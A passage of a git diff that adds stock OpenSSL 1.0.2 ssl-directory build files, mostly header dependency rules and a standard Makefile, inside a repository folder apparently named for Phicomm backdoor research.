+ssl_txt.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+ssl_txt.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+ssl_txt.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+ssl_txt.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h ssl_locl.h
+ssl_txt.o: ssl_txt.c
+ssl_utst.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+ssl_utst.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+ssl_utst.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+ssl_utst.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+ssl_utst.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+ssl_utst.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+ssl_utst.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+ssl_utst.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+ssl_utst.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+ssl_utst.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+ssl_utst.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+ssl_utst.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+ssl_utst.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+ssl_utst.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+ssl_utst.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+ssl_utst.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+ssl_utst.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h ssl_locl.h
+ssl_utst.o: ssl_utst.c
+t1_clnt.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+t1_clnt.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+t1_clnt.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+t1_clnt.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+t1_clnt.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+t1_clnt.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+t1_clnt.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+t1_clnt.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+t1_clnt.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+t1_clnt.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+t1_clnt.o: ../include/openssl/pqueue.h ../include/openssl/rand.h
+t1_clnt.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+t1_clnt.o: ../include/openssl/sha.h ../include/openssl/srtp.h
+t1_clnt.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+t1_clnt.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+t1_clnt.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+t1_clnt.o: ../include/openssl/tls1.h ../include/openssl/x509.h
+t1_clnt.o: ../include/openssl/x509_vfy.h ssl_locl.h t1_clnt.c
+t1_enc.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+t1_enc.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+t1_enc.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+t1_enc.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+t1_enc.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+t1_enc.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+t1_enc.o: ../include/openssl/md5.h ../include/openssl/obj_mac.h
+t1_enc.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+t1_enc.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+t1_enc.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+t1_enc.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+t1_enc.o: ../include/openssl/rand.h ../include/openssl/rsa.h
+t1_enc.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+t1_enc.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+t1_enc.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+t1_enc.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+t1_enc.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+t1_enc.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h ssl_locl.h
+t1_enc.o: t1_enc.c
+t1_ext.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+t1_ext.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+t1_ext.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+t1_ext.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+t1_ext.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+t1_ext.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+t1_ext.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+t1_ext.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+t1_ext.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+t1_ext.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+t1_ext.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+t1_ext.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+t1_ext.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+t1_ext.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+t1_ext.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+t1_ext.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+t1_ext.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h ssl_locl.h
+t1_ext.o: t1_ext.c
+t1_lib.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+t1_lib.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+t1_lib.o: ../include/openssl/crypto.h ../include/openssl/dsa.h
+t1_lib.o: ../include/openssl/dtls1.h ../include/openssl/e_os2.h
+t1_lib.o: ../include/openssl/err.h ../include/openssl/evp.h
+t1_lib.o: ../include/openssl/hmac.h ../include/openssl/kssl.h
+t1_lib.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+t1_lib.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+t1_lib.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+t1_lib.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+t1_lib.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+t1_lib.o: ../include/openssl/pqueue.h ../include/openssl/rand.h
+t1_lib.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+t1_lib.o: ../include/openssl/sha.h ../include/openssl/srtp.h
+t1_lib.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+t1_lib.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+t1_lib.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+t1_lib.o: ../include/openssl/tls1.h ../include/openssl/x509.h
+t1_lib.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h ssl_locl.h
+t1_lib.o: t1_lib.c
+t1_meth.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+t1_meth.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+t1_meth.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+t1_meth.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+t1_meth.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+t1_meth.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+t1_meth.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+t1_meth.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+t1_meth.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+t1_meth.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+t1_meth.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+t1_meth.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+t1_meth.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+t1_meth.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+t1_meth.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+t1_meth.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+t1_meth.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h ssl_locl.h
+t1_meth.o: t1_meth.c
+t1_reneg.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+t1_reneg.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+t1_reneg.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+t1_reneg.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+t1_reneg.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+t1_reneg.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+t1_reneg.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+t1_reneg.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+t1_reneg.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+t1_reneg.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+t1_reneg.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+t1_reneg.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+t1_reneg.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+t1_reneg.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+t1_reneg.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+t1_reneg.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+t1_reneg.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h ssl_locl.h
+t1_reneg.o: t1_reneg.c
+t1_srvr.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+t1_srvr.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+t1_srvr.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+t1_srvr.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+t1_srvr.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+t1_srvr.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+t1_srvr.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+t1_srvr.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+t1_srvr.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+t1_srvr.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+t1_srvr.o: ../include/openssl/pqueue.h ../include/openssl/rand.h
+t1_srvr.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+t1_srvr.o: ../include/openssl/sha.h ../include/openssl/srtp.h
+t1_srvr.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+t1_srvr.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+t1_srvr.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+t1_srvr.o: ../include/openssl/tls1.h ../include/openssl/x509.h
+t1_srvr.o: ../include/openssl/x509_vfy.h ssl_locl.h t1_srvr.c
+t1_trce.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+t1_trce.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+t1_trce.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+t1_trce.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+t1_trce.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+t1_trce.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+t1_trce.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+t1_trce.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+t1_trce.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+t1_trce.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+t1_trce.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+t1_trce.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+t1_trce.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+t1_trce.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+t1_trce.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+t1_trce.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+t1_trce.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h ssl_locl.h
+t1_trce.o: t1_trce.c
+tls_srp.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+tls_srp.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+tls_srp.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+tls_srp.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+tls_srp.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+tls_srp.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+tls_srp.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+tls_srp.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+tls_srp.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+tls_srp.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+tls_srp.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+tls_srp.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+tls_srp.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+tls_srp.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+tls_srp.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+tls_srp.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+tls_srp.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h ssl_locl.h
+tls_srp.o: tls_srp.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/Makefile.save
new file mode 100644
index 0000000..bd4b86b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/Makefile.save
@@ -0,0 +1,1018 @@
+#
+# OpenSSL/ssl/Makefile
+#
+
+DIR=	ssl
+TOP=	..
+CC=	cc
+INCLUDES= -I../crypto -I$(TOP) -I../include $(KRB5_INCLUDES)
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+# KRB5 stuff
+KRB5_INCLUDES=
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile README ssl-lib.com install.com
+TEST=ssltest.c heartbeat_test.c
+APPS=
+
+LIB=$(TOP)/libssl.a
+SHARED_LIB= libssl$(SHLIB_EXT)
+LIBSRC=	\
+	s2_meth.c   s2_srvr.c s2_clnt.c  s2_lib.c  s2_enc.c s2_pkt.c \
+	s3_meth.c   s3_srvr.c s3_clnt.c  s3_lib.c  s3_enc.c s3_pkt.c s3_both.c s3_cbc.c \
+	s23_meth.c s23_srvr.c s23_clnt.c s23_lib.c          s23_pkt.c \
+	t1_meth.c   t1_srvr.c t1_clnt.c  t1_lib.c  t1_enc.c t1_ext.c \
+	d1_meth.c   d1_srvr.c d1_clnt.c  d1_lib.c  d1_pkt.c \
+	d1_both.c d1_srtp.c \
+	ssl_lib.c ssl_err2.c ssl_cert.c ssl_sess.c \
+	ssl_ciph.c ssl_stat.c ssl_rsa.c \
+	ssl_asn1.c ssl_txt.c ssl_algs.c ssl_conf.c \
+	bio_ssl.c ssl_err.c kssl.c t1_reneg.c tls_srp.c t1_trce.c ssl_utst.c
+LIBOBJ= \
+	s2_meth.o  s2_srvr.o  s2_clnt.o  s2_lib.o  s2_enc.o s2_pkt.o \
+	s3_meth.o  s3_srvr.o  s3_clnt.o  s3_lib.o  s3_enc.o s3_pkt.o s3_both.o s3_cbc.o \
+	s23_meth.o s23_srvr.o s23_clnt.o s23_lib.o          s23_pkt.o \
+	t1_meth.o   t1_srvr.o t1_clnt.o  t1_lib.o  t1_enc.o t1_ext.o \
+	d1_meth.o   d1_srvr.o d1_clnt.o  d1_lib.o  d1_pkt.o \
+	d1_both.o d1_srtp.o\
+	ssl_lib.o ssl_err2.o ssl_cert.o ssl_sess.o \
+	ssl_ciph.o ssl_stat.o ssl_rsa.o \
+	ssl_asn1.o ssl_txt.o ssl_algs.o ssl_conf.o \
+	bio_ssl.o ssl_err.o kssl.o t1_reneg.o tls_srp.o t1_trce.o ssl_utst.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= ssl.h ssl2.h ssl3.h ssl23.h tls1.h dtls1.h kssl.h srtp.h
+HEADER=	$(EXHEADER) ssl_locl.h kssl_lcl.h
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ..; $(MAKE) DIRS=$(DIR) all)
+
+all:	shared
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+shared: lib
+	if [ -n "$(SHARED_LIBS)" ]; then \
+		(cd ..; $(MAKE) $(SHARED_LIB)); \
+	fi
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@if [ -z "$(THIS)" ]; then \
+	    $(MAKE) -f $(TOP)/Makefile reflect THIS=$@; \
+	else \
+	    $(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC); \
+	fi
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+bio_ssl.o: ../include/openssl/asn1.h ../include/openssl/bio.h
+bio_ssl.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+bio_ssl.o: ../include/openssl/dtls1.h ../include/openssl/e_os2.h
+bio_ssl.o: ../include/openssl/err.h ../include/openssl/evp.h
+bio_ssl.o: ../include/openssl/hmac.h ../include/openssl/kssl.h
+bio_ssl.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+bio_ssl.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+bio_ssl.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+bio_ssl.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+bio_ssl.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+bio_ssl.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+bio_ssl.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+bio_ssl.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+bio_ssl.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+bio_ssl.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+bio_ssl.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h bio_ssl.c
+d1_both.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+d1_both.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+d1_both.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+d1_both.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+d1_both.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+d1_both.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+d1_both.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+d1_both.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+d1_both.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+d1_both.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+d1_both.o: ../include/openssl/pqueue.h ../include/openssl/rand.h
+d1_both.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+d1_both.o: ../include/openssl/sha.h ../include/openssl/srtp.h
+d1_both.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+d1_both.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+d1_both.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+d1_both.o: ../include/openssl/tls1.h ../include/openssl/x509.h
+d1_both.o: ../include/openssl/x509_vfy.h d1_both.c ssl_locl.h
+d1_clnt.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+d1_clnt.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+d1_clnt.o: ../include/openssl/crypto.h ../include/openssl/dh.h
+d1_clnt.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+d1_clnt.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+d1_clnt.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+d1_clnt.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+d1_clnt.o: ../include/openssl/md5.h ../include/openssl/obj_mac.h
+d1_clnt.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+d1_clnt.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+d1_clnt.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+d1_clnt.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+d1_clnt.o: ../include/openssl/rand.h ../include/openssl/rsa.h
+d1_clnt.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+d1_clnt.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+d1_clnt.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+d1_clnt.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+d1_clnt.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+d1_clnt.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h d1_clnt.c
+d1_clnt.o: ssl_locl.h
+d1_lib.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+d1_lib.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+d1_lib.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+d1_lib.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+d1_lib.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+d1_lib.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+d1_lib.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+d1_lib.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+d1_lib.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+d1_lib.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+d1_lib.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+d1_lib.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+d1_lib.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+d1_lib.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+d1_lib.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+d1_lib.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+d1_lib.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h d1_lib.c
+d1_lib.o: ssl_locl.h
+d1_meth.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+d1_meth.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+d1_meth.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+d1_meth.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+d1_meth.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+d1_meth.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+d1_meth.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+d1_meth.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+d1_meth.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+d1_meth.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+d1_meth.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+d1_meth.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+d1_meth.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+d1_meth.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+d1_meth.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+d1_meth.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+d1_meth.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h d1_meth.c
+d1_meth.o: ssl_locl.h
+d1_pkt.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+d1_pkt.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+d1_pkt.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+d1_pkt.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+d1_pkt.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+d1_pkt.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+d1_pkt.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+d1_pkt.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+d1_pkt.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+d1_pkt.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+d1_pkt.o: ../include/openssl/pqueue.h ../include/openssl/rand.h
+d1_pkt.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+d1_pkt.o: ../include/openssl/sha.h ../include/openssl/srtp.h
+d1_pkt.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+d1_pkt.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+d1_pkt.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+d1_pkt.o: ../include/openssl/tls1.h ../include/openssl/x509.h
+d1_pkt.o: ../include/openssl/x509_vfy.h d1_pkt.c ssl_locl.h
+d1_srtp.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+d1_srtp.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+d1_srtp.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+d1_srtp.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+d1_srtp.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+d1_srtp.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+d1_srtp.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+d1_srtp.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+d1_srtp.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+d1_srtp.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+d1_srtp.o: ../include/openssl/pqueue.h ../include/openssl/rsa.h
+d1_srtp.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+d1_srtp.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+d1_srtp.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+d1_srtp.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+d1_srtp.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+d1_srtp.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h d1_srtp.c
+d1_srtp.o: srtp.h ssl_locl.h
+d1_srvr.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+d1_srvr.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+d1_srvr.o: ../include/openssl/crypto.h ../include/openssl/dh.h
+d1_srvr.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+d1_srvr.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+d1_srvr.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+d1_srvr.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+d1_srvr.o: ../include/openssl/md5.h ../include/openssl/obj_mac.h
+d1_srvr.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+d1_srvr.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+d1_srvr.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+d1_srvr.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+d1_srvr.o: ../include/openssl/rand.h ../include/openssl/rsa.h
+d1_srvr.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+d1_srvr.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+d1_srvr.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+d1_srvr.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+d1_srvr.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+d1_srvr.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h d1_srvr.c
+d1_srvr.o: ssl_locl.h
+kssl.o: ../include/openssl/asn1.h ../include/openssl/bio.h
+kssl.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+kssl.o: ../include/openssl/dtls1.h ../include/openssl/e_os2.h
+kssl.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+kssl.o: ../include/openssl/krb5_asn.h ../include/openssl/kssl.h
+kssl.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+kssl.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
